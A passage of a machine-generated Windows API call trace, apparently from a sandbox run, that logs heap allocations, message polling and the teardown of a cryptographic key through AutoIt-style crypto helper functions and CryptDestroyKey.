dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0229.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0229.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0229.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0229.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0229.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0229.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0229.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0229.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.057] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0229.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0229.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f38 [0229.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0229.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0229.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0229.058] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0229.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0229.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0229.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0229.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0229.059] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0229.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0229.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0229.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0229.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0229.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0229.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0229.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0229.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0229.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0229.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0229.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0229.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0229.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0229.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0229.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0229.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0229.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0229.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0229.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0229.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0229.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0229.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e511f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0229.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0229.061] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0229.062] CryptDestroyKey (hKey=0xa87310) returned 1 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0229.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0229.064] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0229.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0229.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.065] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0229.065] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0229.065] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.065] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0229.065] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0229.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0229.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0229.067] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.067] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0229.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0229.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0229.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0229.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0229.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0229.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0229.067] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0229.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.067] RtlAllocateHeap 